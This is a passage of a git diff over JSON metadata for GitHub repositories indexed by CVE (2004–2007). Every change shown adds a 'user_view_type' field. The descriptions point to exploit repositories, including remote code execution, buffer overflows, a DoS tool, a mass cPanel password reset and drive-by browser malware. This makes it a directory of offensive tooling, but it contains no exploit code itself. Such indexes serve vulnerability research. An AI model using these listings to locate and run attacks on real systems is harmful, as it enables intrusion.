14090955, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14090955?v=4", - "html_url": "https:\/\/github.com\/ratiros01" + "html_url": "https:\/\/github.com\/ratiros01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ratiros01\/CVE-2004-1561", "description": null, @@ -67,7 +69,8 @@ "login": "darrynb89", "id": 23241437, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23241437?v=4", - "html_url": "https:\/\/github.com\/darrynb89" + "html_url": "https:\/\/github.com\/darrynb89", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/darrynb89\/CVE-2004-1561", "description": "Python version of Metasploit exploit for CVE-2004-1561", @@ -97,7 +100,8 @@ "login": "thel1nus", "id": 77783022, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77783022?v=4", - "html_url": "https:\/\/github.com\/thel1nus" + "html_url": "https:\/\/github.com\/thel1nus", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thel1nus\/CVE-2004-1561-Notes", "description": "My notes for CVE-2004-1561 IceCast exploitation", diff --git a/2004/CVE-2004-1769.json b/2004/CVE-2004-1769.json index 5729c11d73..9fadeee66e 100644 --- a/2004/CVE-2004-1769.json +++ b/2004/CVE-2004-1769.json @@ -7,7 +7,8 @@ "login": "sinkaroid", "id": 12372481, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12372481?v=4", - "html_url": "https:\/\/github.com\/sinkaroid" + "html_url": "https:\/\/github.com\/sinkaroid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sinkaroid\/shiguresh", "description": "CVE-2004-1769 cPanel Resetpass Remote Command Execution", @@ -40,7 +41,8 @@ "login": "Redsplit", "id": 65139960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65139960?v=4", - "html_url": "https:\/\/github.com\/Redsplit" + "html_url": "https:\/\/github.com\/Redsplit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Redsplit\/shiguresh", "description": "CVE-2004-1769 \/\/ Mass cPanel Reset password", diff --git a/2004/CVE-2004-2167.json b/2004/CVE-2004-2167.json index e109251fd2..3f66ae03ad 100644 --- a/2004/CVE-2004-2167.json +++ b/2004/CVE-2004-2167.json @@ -7,7 +7,8 @@ "login": "uzzzval", "id": 7476462, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7476462?v=4", - "html_url": "https:\/\/github.com\/uzzzval" + "html_url": "https:\/\/github.com\/uzzzval", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uzzzval\/cve-2004-2167", "description": null, diff --git a/2004/CVE-2004-2271.json b/2004/CVE-2004-2271.json index 33bf1afe28..500ef1833c 100644 --- a/2004/CVE-2004-2271.json +++ b/2004/CVE-2004-2271.json @@ -7,7 +7,8 @@ "login": "kkirsche", "id": 947110, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/947110?v=4", - "html_url": "https:\/\/github.com\/kkirsche" + "html_url": "https:\/\/github.com\/kkirsche", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kkirsche\/CVE-2004-2271", "description": "Minishare 1.4.1 Remote Buffer Overflow", @@ -37,7 +38,8 @@ "login": "PercussiveElbow", "id": 10052381, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10052381?v=4", - "html_url": "https:\/\/github.com\/PercussiveElbow" + "html_url": "https:\/\/github.com\/PercussiveElbow", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/PercussiveElbow\/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow", "description": null, @@ -67,7 +69,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2004-2271", "description": "CVE-2004-2271 - Minishare 1.4.1 HTTP Server Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", @@ -97,7 +100,8 @@ "login": "pwncone", "id": 57570315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57570315?v=4", - "html_url": "https:\/\/github.com\/pwncone" + "html_url": "https:\/\/github.com\/pwncone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwncone\/CVE-2004-2271-MiniShare-1.4.1-BOF", "description": "A python implementation of CVE-2004-2271 targeting MiniShare 1.4.1.", diff --git a/2004/CVE-2004-2449.json b/2004/CVE-2004-2449.json index 0e2b8db97d..ceff3f7bfd 100644 --- a/2004/CVE-2004-2449.json +++ b/2004/CVE-2004-2449.json @@ -7,7 +7,8 @@ "login": "ParallelVisions", "id": 70821640, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70821640?v=4", - "html_url": "https:\/\/github.com\/ParallelVisions" + "html_url": "https:\/\/github.com\/ParallelVisions", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ParallelVisions\/DoSTool", "description": "DDoS Tool which exploits vulnerability CVE-2004-2449 from vendor GameSpy (now known as OpenSpy). User is prompted for input IP address, and port. (NOTE: Please use this responsibly, I made this as a proof of concept of vulnerability exploitation ONLY. I do not endorse DOSing, DDoSing, or cheating in any way. Use this at your own risk.)", diff --git a/2004/CVE-2004-2549.json b/2004/CVE-2004-2549.json index e0ce28c0bd..a5a97a9115 100644 --- a/2004/CVE-2004-2549.json +++ b/2004/CVE-2004-2549.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2004-2549", "description": "Nortel Wireless LAN Access Point 2200 Series - Denial of Service", diff --git a/2004/CVE-2004-2687.json b/2004/CVE-2004-2687.json index a3df7de335..402c08c6dc 100644 --- a/2004/CVE-2004-2687.json +++ b/2004/CVE-2004-2687.json @@ -7,7 +7,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/distccd_rce_CVE-2004-2687", "description": null, @@ -37,7 +38,8 @@ "login": "k4miyo", "id": 49828037, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49828037?v=4", - "html_url": "https:\/\/github.com\/k4miyo" + "html_url": "https:\/\/github.com\/k4miyo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/k4miyo\/CVE-2004-2687", "description": "CVE-2004-2687 DistCC Daemon Command Execution", @@ -67,7 +69,8 @@ "login": "ss0wl", "id": 61596312, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61596312?v=4", - "html_url": "https:\/\/github.com\/ss0wl" + "html_url": "https:\/\/github.com\/ss0wl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ss0wl\/CVE-2004-2687_distcc_v1", "description": "Remote Command Execution exploit for vulnerability CVE-2004-2687 in DistCC Daemon v1", diff --git a/2004/CVE-2004-6768.json b/2004/CVE-2004-6768.json index afd500ed08..673787d75a 100644 --- a/2004/CVE-2004-6768.json +++ b/2004/CVE-2004-6768.json @@ -7,7 +7,8 @@ "login": "yougboiz", "id": 133153602, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133153602?v=4", - "html_url": "https:\/\/github.com\/yougboiz" + "html_url": "https:\/\/github.com\/yougboiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/yougboiz\/Metasploit-CVE-2004-6768", "description": null, diff --git a/2005/CVE-2005-0575.json b/2005/CVE-2005-0575.json index a13c6faee9..8f1427741b 100644 --- a/2005/CVE-2005-0575.json +++ b/2005/CVE-2005-0575.json @@ -7,7 +7,8 @@ "login": "3t3rn4lv01d", "id": 78852098, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78852098?v=4", - "html_url": "https:\/\/github.com\/3t3rn4lv01d" + "html_url": "https:\/\/github.com\/3t3rn4lv01d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3t3rn4lv01d\/CVE-2005-0575", "description": "Exploit for KNet 1.04b Web Server Buffer Overflow SEH", diff --git a/2005/CVE-2005-0603.json b/2005/CVE-2005-0603.json index 134fc4465c..9edbcce907 100644 --- a/2005/CVE-2005-0603.json +++ b/2005/CVE-2005-0603.json @@ -7,7 +7,8 @@ "login": "Parcer0", "id": 70012338, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70012338?v=4", - "html_url": "https:\/\/github.com\/Parcer0" + "html_url": "https:\/\/github.com\/Parcer0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Parcer0\/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure", "description": null, diff --git a/2005/CVE-2005-1125.json b/2005/CVE-2005-1125.json index ec886b4a77..ff967569dd 100644 --- a/2005/CVE-2005-1125.json +++ b/2005/CVE-2005-1125.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/libsafe-CVE-2005-1125", "description": "Libsafe - Safety Check Bypass Vulnerability (Proof of Concept Exploit & Time Randomization to Thwart It)", diff --git a/2005/CVE-2005-1794.json b/2005/CVE-2005-1794.json index c0425fef15..1151492381 100644 --- a/2005/CVE-2005-1794.json +++ b/2005/CVE-2005-1794.json @@ -7,7 +7,8 @@ "login": "InitRoot", "id": 954507, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/954507?v=4", - "html_url": "https:\/\/github.com\/InitRoot" + "html_url": "https:\/\/github.com\/InitRoot", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/InitRoot\/CVE-2005-1794Scanner", "description": "Scanner for network for CVE-2005-1794.", diff --git a/2005/CVE-2005-2428.json b/2005/CVE-2005-2428.json index 134c8d301b..a2f9ffdda7 100644 --- a/2005/CVE-2005-2428.json +++ b/2005/CVE-2005-2428.json @@ -7,7 +7,8 @@ "login": "schwankner", "id": 1496765, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1496765?v=4", - "html_url": "https:\/\/github.com\/schwankner" + "html_url": "https:\/\/github.com\/schwankner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/schwankner\/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit", "description": "IBM Lotus Domino <= R8 Password Hash Extraction Exploit", diff --git a/2005/CVE-2005-3299.json b/2005/CVE-2005-3299.json index a241c17d26..9948927d9c 100644 --- a/2005/CVE-2005-3299.json +++ b/2005/CVE-2005-3299.json @@ -7,7 +7,8 @@ "login": "RizeKishimaro", "id": 75617768, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75617768?v=4", - "html_url": "https:\/\/github.com\/RizeKishimaro" + "html_url": "https:\/\/github.com\/RizeKishimaro", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RizeKishimaro\/CVE-2005-3299", "description": "CVE 2005 exploit.Perl in Perl.", @@ -37,7 +38,8 @@ "login": "Cr0w-ui", "id": 173009007, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173009007?v=4", - "html_url": "https:\/\/github.com\/Cr0w-ui" + "html_url": "https:\/\/github.com\/Cr0w-ui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cr0w-ui\/-CVE-2005-3299-", "description": " phpMyAdmin 2.6.4-pl1 - Directory Traversal", diff --git a/2006/CVE-2006-0450.json b/2006/CVE-2006-0450.json index a975a46f8c..a0f6d9cffe 100644 --- a/2006/CVE-2006-0450.json +++ b/2006/CVE-2006-0450.json @@ -7,7 +7,8 @@ "login": "Parcer0", "id": 70012338, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70012338?v=4", - "html_url": "https:\/\/github.com\/Parcer0" + "html_url": "https:\/\/github.com\/Parcer0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Parcer0\/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities", "description": "CVE-2006-0450. phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.", diff --git a/2006/CVE-2006-0987.json b/2006/CVE-2006-0987.json index 745cc32f1b..377d2e8fec 100644 --- a/2006/CVE-2006-0987.json +++ b/2006/CVE-2006-0987.json @@ -7,7 +7,8 @@ "login": "pcastagnaro", "id": 8824742, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8824742?v=4", - "html_url": "https:\/\/github.com\/pcastagnaro" + "html_url": "https:\/\/github.com\/pcastagnaro", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pcastagnaro\/dns_amplification_scanner", "description": "This script checks if each domain from a given domain list is vulnerable to CVE-2006-0987", diff --git a/2006/CVE-2006-1236.json b/2006/CVE-2006-1236.json index 0a18b3e9b1..03cacf3a97 100644 --- a/2006/CVE-2006-1236.json +++ b/2006/CVE-2006-1236.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2006-1236", "description": "Exploit script for Crossfire 1.9.0", diff --git a/2006/CVE-2006-20001.json b/2006/CVE-2006-20001.json index 6d1efc4ba5..7db70842a5 100644 --- a/2006/CVE-2006-20001.json +++ b/2006/CVE-2006-20001.json @@ -7,7 +7,8 @@ "login": "Saksham2002", "id": 31695520, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31695520?v=4", - "html_url": "https:\/\/github.com\/Saksham2002" + "html_url": "https:\/\/github.com\/Saksham2002", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Saksham2002\/CVE-2006-20001", "description": "A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier. CVE project by @Sn0wAlice", diff --git a/2006/CVE-2006-2842.json b/2006/CVE-2006-2842.json index ae43fb796c..37f3e3fdde 100644 --- a/2006/CVE-2006-2842.json +++ b/2006/CVE-2006-2842.json @@ -7,7 +7,8 @@ "login": "karthi-the-hacker", "id": 33289300, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", - "html_url": "https:\/\/github.com\/karthi-the-hacker" + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2006-2842", "description": "CVE-2006-2842 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.", diff --git a/2006/CVE-2006-3392.json b/2006/CVE-2006-3392.json index 61756bf938..f76d4f6e49 100644 --- a/2006/CVE-2006-3392.json +++ b/2006/CVE-2006-3392.json @@ -7,7 +7,8 @@ "login": "0xtz", "id": 53442065, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53442065?v=4", - "html_url": "https:\/\/github.com\/0xtz" + "html_url": "https:\/\/github.com\/0xtz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xtz\/CVE-2006-3392", "description": "Webmin < 1.290 \/ Usermin < 1.220 - Arbitrary File Disclosure (Python3)", @@ -37,7 +38,8 @@ "login": "IvanGlinkin", "id": 64857726, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64857726?v=4", - "html_url": "https:\/\/github.com\/IvanGlinkin" + "html_url": "https:\/\/github.com\/IvanGlinkin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/IvanGlinkin\/CVE-2006-3392", "description": "This small script helps to avoid using MetaSploit (msfconsole) during the Enterprise pentests and OSCP-like exams. Grep included function will help you to get only the important information.", @@ -67,7 +69,8 @@ "login": "Adel-kaka-dz", "id": 65834056, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65834056?v=4", - "html_url": "https:\/\/github.com\/Adel-kaka-dz" + "html_url": "https:\/\/github.com\/Adel-kaka-dz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Adel-kaka-dz\/CVE-2006-3392", "description": "It is a simple tool to exploit local file include . vulnerabilities", @@ -97,7 +100,8 @@ "login": "gb21oc", "id": 66036094, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66036094?v=4", - "html_url": "https:\/\/github.com\/gb21oc" + "html_url": "https:\/\/github.com\/gb21oc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gb21oc\/ExploitWebmin", "description": "Python script to exploit webmin vulnerability cve-2006-3392", @@ -127,7 +131,8 @@ "login": "kernel-cyber", "id": 21226709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4", - "html_url": "https:\/\/github.com\/kernel-cyber" + "html_url": "https:\/\/github.com\/kernel-cyber", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2006-3392", "description": "Webmin Local File Include (unauthenticated)", @@ -157,7 +162,8 @@ "login": "g1vi", "id": 120142960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", - "html_url": "https:\/\/github.com\/g1vi" + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g1vi\/CVE-2006-3392", "description": "Webmin < 1.290 \/ Usermin < 1.220 - Arbitrary file disclosure", @@ -187,7 +193,8 @@ "login": "MrEmpy", "id": 71796063, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4", - "html_url": "https:\/\/github.com\/MrEmpy" + "html_url": "https:\/\/github.com\/MrEmpy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MrEmpy\/CVE-2006-3392", "description": null, diff --git a/2006/CVE-2006-3592.json b/2006/CVE-2006-3592.json index b79490375c..be669b5b72 100644 --- a/2006/CVE-2006-3592.json +++ b/2006/CVE-2006-3592.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2006-3592", "description": "Exploit for Easy File Sharing FTP Server 3.5 on Win7 32", diff --git a/2006/CVE-2006-3747.json b/2006/CVE-2006-3747.json index 888b37e9b0..f5d569cc8d 100644 --- a/2006/CVE-2006-3747.json +++ b/2006/CVE-2006-3747.json @@ -7,7 +7,8 @@ "login": "defensahacker", "id": 23421429, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23421429?v=4", - "html_url": "https:\/\/github.com\/defensahacker" + "html_url": "https:\/\/github.com\/defensahacker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defensahacker\/CVE-2006-3747", "description": "Information about my advisory on CVE-2006-3747 (Apache mod_rewrite LDAP off-by-one buffer overflow).. At the time, it was the first public working exploit :)", diff --git a/2006/CVE-2006-4777.json b/2006/CVE-2006-4777.json index 44040e42d3..6565528b50 100644 --- a/2006/CVE-2006-4777.json +++ b/2006/CVE-2006-4777.json @@ -7,7 +7,8 @@ "login": "Mario1234", "id": 30897590, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30897590?v=4", - "html_url": "https:\/\/github.com\/Mario1234" + "html_url": "https:\/\/github.com\/Mario1234", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Mario1234\/js-driveby-download-CVE-2006-4777", "description": "malware del lado del cliente de explotacion de vulnerabilidad de internet explorer 6.0 SP1 en windows xp SP2. No requiere de consentimiento por parte del usuario y no descarga ningun archivo", diff --git a/2006/CVE-2006-4814.json b/2006/CVE-2006-4814.json index cfe611a562..1a14edd563 100644 --- a/2006/CVE-2006-4814.json +++ b/2006/CVE-2006-4814.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/linux-CVE-2006-4814", "description": "A deadlock on the mmap semaphore ‘mmap sem’ in the CentOS 3.9 kernel, that is triggered by a specific interleaving of concurrent threads, one calling the mmap system call and the other calling the mincore system call.", diff --git a/2006/CVE-2006-5051.json b/2006/CVE-2006-5051.json index e2bea142b6..b6e503197b 100644 --- a/2006/CVE-2006-5051.json +++ b/2006/CVE-2006-5051.json @@ -7,7 +7,8 @@ "login": "bigb0x", "id": 13532434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", - "html_url": "https:\/\/github.com\/bigb0x" + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", @@ -43,7 +44,8 @@ "login": "sardine-web", "id": 80635620, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", - "html_url": "https:\/\/github.com\/sardine-web" + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387_Check", "description": "A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.", @@ -73,7 +75,8 @@ "login": "ThemeHackers", "id": 107047730, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", - "html_url": "https:\/\/github.com\/ThemeHackers" + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-6387", "description": "CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.", diff --git a/2006/CVE-2006-6184.json b/2006/CVE-2006-6184.json index 3e73cb653b..c74072f220 100644 --- a/2006/CVE-2006-6184.json +++ b/2006/CVE-2006-6184.json @@ -7,7 +7,8 @@ "login": "shauntdergrigorian", "id": 7718028, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7718028?v=4", - "html_url": "https:\/\/github.com\/shauntdergrigorian" + "html_url": "https:\/\/github.com\/shauntdergrigorian", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shauntdergrigorian\/cve-2006-6184", "description": "This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.", @@ -37,7 +38,8 @@ "login": "b03902043", "id": 9023845, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9023845?v=4", - "html_url": "https:\/\/github.com\/b03902043" + "html_url": "https:\/\/github.com\/b03902043", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b03902043\/CVE-2006-6184", "description": "simplified version of https:\/\/github.com\/shauntdergrigorian\/cve-2006-6184", diff --git a/2007/CVE-2007-0038.json b/2007/CVE-2007-0038.json index b4bc546a0a..4dd59a3fba 100644 --- a/2007/CVE-2007-0038.json +++ b/2007/CVE-2007-0038.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2007-0038", "description": "IE7 buffer overflow through an ANI file", diff --git a/2007/CVE-2007-0843.json b/2007/CVE-2007-0843.json index 6497edae84..6aa6436408 100644 --- a/2007/CVE-2007-0843.json +++ b/2007/CVE-2007-0843.json @@ -7,7 +7,8 @@ "login": "z3APA3A", "id": 7222768, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7222768?v=4", - "html_url": "https:\/\/github.com\/z3APA3A" + "html_url": "https:\/\/github.com\/z3APA3A", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/z3APA3A\/spydir", "description": "Spydir is a small utility to monitor file changes in Windows directory regardless of subdirectory and files permissions (exploits CVE-2007-0843)", diff --git a/2007/CVE-2007-1567.json b/2007/CVE-2007-1567.json index 039c3e14b2..f82e031b9e 100644 --- a/2007/CVE-2007-1567.json +++ b/2007/CVE-2007-1567.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2007-1567", "description": "CVE-2007-1567 - WarFTP 1.65 'USER' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2007/CVE-2007-1858.json b/2007/CVE-2007-1858.json index 0049d0e3c7..2ccbbbdc23 100644 --- a/2007/CVE-2007-1858.json +++ b/2007/CVE-2007-1858.json @@ -7,7 +7,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", diff --git a/2007/CVE-2007-2447.json b/2007/CVE-2007-2447.json index fd9d6ed99a..fb96249d56 100644 --- a/2007/CVE-2007-2447.json +++ b/2007/CVE-2007-2447.json @@ -7,7 +7,8 @@ "login": "amriunix", "id": 6618368, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6618368?v=4", - "html_url": "https:\/\/github.com\/amriunix" + "html_url": "https:\/\/github.com\/amriunix", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/amriunix\/CVE-2007-2447", "description": "CVE-2007-2447 - Samba usermap script", @@ -37,7 +38,8 @@ "login": "Unix13", "id": 52569108, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52569108?v=4", - "html_url": "https:\/\/github.com\/Unix13" + "html_url": "https:\/\/github.com\/Unix13", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Unix13\/metasploitable2", "description": "PHP-CGI-REMOTE_CVE-2012-1823, UnrealIRCd, MySQL, PostgreSQL and SSH bruteforce, VSFTPD2.3.4, samba CVE-2007-2447, JAVA RMI Server, distcc daemon, misconfigured NFS files, etc.", @@ -67,7 +69,8 @@ "login": "b1fair", "id": 43326124, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43326124?v=4", - "html_url": "https:\/\/github.com\/b1fair" + "html_url": "https:\/\/github.com\/b1fair", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b1fair\/smb_usermap", "description": "A simple exploit for CVE-2007-2447", @@ -97,7 +100,8 @@ "login": "JoseBarrios", "id": 794342, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/794342?v=4", - "html_url": "https:\/\/github.com\/JoseBarrios" + "html_url": "https:\/\/github.com\/JoseBarrios", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JoseBarrios\/CVE-2007-2447", "description": "Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters.", @@ -127,7 +131,8 @@ "login": "3x1t1um", "id": 54857145, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54857145?v=4", - "html_url": "https:\/\/github.com\/3x1t1um" + "html_url": "https:\/\/github.com\/3x1t1um", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3x1t1um\/CVE-2007-2447", "description": null, @@ -157,7 +162,8 @@ "login": "xlcc4096", "id": 75581853, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75581853?v=4", - "html_url": "https:\/\/github.com\/xlcc4096" + "html_url": "https:\/\/github.com\/xlcc4096", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xlcc4096\/exploit-CVE-2007-2447", "description": "Exploit for the vulnerability CVE-2007-2447", @@ -187,7 +193,8 @@ "login": "WildfootW", "id": 11520473, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4", - "html_url": "https:\/\/github.com\/WildfootW" + "html_url": "https:\/\/github.com\/WildfootW", + "user_view_type": "public" }, "html_url": 